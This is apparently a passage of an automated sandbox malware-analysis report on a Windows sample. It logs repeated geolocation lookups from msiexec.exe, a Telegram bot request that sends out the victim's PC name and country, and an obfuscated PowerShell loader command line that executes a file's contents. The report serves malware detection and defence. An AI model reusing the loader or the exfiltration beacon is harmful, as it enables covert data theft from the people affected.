                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=123129&min_rtt=40516&rtt_var=154592&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7358&cwnd=126&unsent_bytes=0&cid=3ac535b8ecbf19a9&ts=1021&x=0"
                                                                                                                                                                          2025-03-07 15:20:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.849696104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:00 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          2025-03-07 15:21:01 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:01 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3417
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFOzgY5ZHkKpkuvUMqkNzTqEf1tSnBljmAZuvgEZuDSe%2FaVZmNqxZLAoGLBLoITL9HI3Wa4zyXHmZRei6pyDF7JAREtOIwGx0B3mzjBeD%2Bvww%2BMMq3mOQYfosTOUVhJTR%2FtDsH29"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb1486a8271fd6-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=121967&min_rtt=39917&rtt_var=153448&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7438&cwnd=186&unsent_bytes=0&cid=e31d80c8dc908f7e&ts=870&x=0"
                                                                                                                                                                          2025-03-07 15:21:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.849698104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:04 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:21:05 UTC862INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:04 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3421
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7lW9%2BwhM0XvjcNJhW%2FecQPzoMAsvrxHREjoIFpnvrDu%2BnobedvwOBkb3R3LxQzUFYasZIfPdw9Au3M1POpvD5SzGnbXQg0g7m0Gv%2BXuAs2X%2BLDvMkPZck%2BY2eYN5BlFolBvCz77x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb149cada49c61-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=119722&min_rtt=37740&rtt_var=152751&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7462&cwnd=252&unsent_bytes=0&cid=6ea78442c51f3ae6&ts=1068&x=0"
                                                                                                                                                                          2025-03-07 15:21:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.849700104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:07 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:21:08 UTC862INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:08 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cf-Ray: 91cb14b2bc56c9bc-IAD
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          Age: 3424
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          Cf-Cache-Status: HIT
                                                                                                                                                                          Last-Modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2CfdVqgaZt%2FpOw%2F2ylVpYhsbCluJU%2BAy6G7vnyt1UBXJP1hrhhQPD1bGQ479fYOMRaJxvfE2UZPr%2F1UNKEdOAk9H9H5skIvOYAIs32%2Bo07QUPJyXD7gqEQtIqIpu33n5fIpyB47"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=120712&min_rtt=39808&rtt_var=151430&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5698&recv_bytes=699&delivery_rate=7522&cwnd=250&unsent_bytes=0&cid=708e7fab0e6265b1&ts=1017&x=0"
                                                                                                                                                                          2025-03-07 15:21:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.849702104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:21:11 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:11 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3427
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FM2IPuAiLUzHpuuP6nYfXieEz7GUJ1UE5mipVAYZQFsQLjXMeNMp1gZazX%2FOlGVkFT5p%2BXecwvM76Ay4NcRFeZOVtkl9JJk9MEe3HJY6SQEq4XZmtXRMiN%2FHdeQZwmaNjrT5J3RO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb14c879613973-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=121151&min_rtt=39769&rtt_var=152248&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5700&recv_bytes=699&delivery_rate=7491&cwnd=226&unsent_bytes=0&cid=01adfa12ce2b7884&ts=1021&x=0"
                                                                                                                                                                          2025-03-07 15:21:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          8192.168.2.849704104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:21:15 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:15 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3431
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FfIuBc6CyUVFC6P%2Fp2LXPWNl7Tzqcyc9c2IT18eMtegUCqx7pkphS8UouYuuP7YnZrzwHoCqImoEJ97EARE8v9u%2F0U3sD6Xd81WTT7tYVzTOJvwLIrlTuGh5G7w0iqDzQTx5%2BSZo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb14df1d66d678-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=122444&min_rtt=41295&rtt_var=152307&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5696&recv_bytes=699&delivery_rate=7469&cwnd=251&unsent_bytes=0&cid=5a25b2433f07a67d&ts=1174&x=0"
                                                                                                                                                                          2025-03-07 15:21:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          9192.168.2.849706104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:21:18 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:18 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3434
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIulPm8LaWNStSjI8wgpQ%2BHp3AzKn68mjFNjdSu6l4JE56QwKPX%2ByY8W%2BtJnXvgw0pw9jPLUKZvdJAJsZskYiBAdOhNb87hkprwSaM1QVqyQbqvs1FQ%2FH3qEFdb5P6Nl3%2BYhtohQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb14f4390556c2-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=127873&min_rtt=47854&rtt_var=152139&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4248&recv_bytes=699&delivery_rate=7433&cwnd=147&unsent_bytes=0&cid=3ac54badf1da8180&ts=929&x=0"
                                                                                                                                                                          2025-03-07 15:21:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          10192.168.2.849708104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          2025-03-07 15:21:22 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:22 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3438
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9McMUDVzS7PguVkivQ%2B7Lbs324iK8ljNINmk6zcYlgSJ3X6AwpQv3Zuf4qE2qIZ6CKk1D3OCLZrItYaOcZ5ZA144jfM3M%2BeuKGAjmsqXAw8zx4VvkDx6AoPfzJ%2BLvpWVjD70bwQU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb150baf411fe2-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=124590&min_rtt=44261&rtt_var=151686&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5696&recv_bytes=699&delivery_rate=7489&cwnd=184&unsent_bytes=0&cid=0489b639664e1ab1&ts=983&x=0"
                                                                                                                                                                          2025-03-07 15:21:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          11192.168.2.849709149.154.167.2204433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:21:25 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:53:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:21:26 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:25 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2025-03-07 15:21:26 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:10:19:55
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\uPDwUy9ewY.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:509'800 bytes
                                                                                                                                                                          MD5 hash:0425118557AA95EA418A0B15DD072078
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:10:19:57
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"
                                                                                                                                                                          Imagebase:0xf90000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
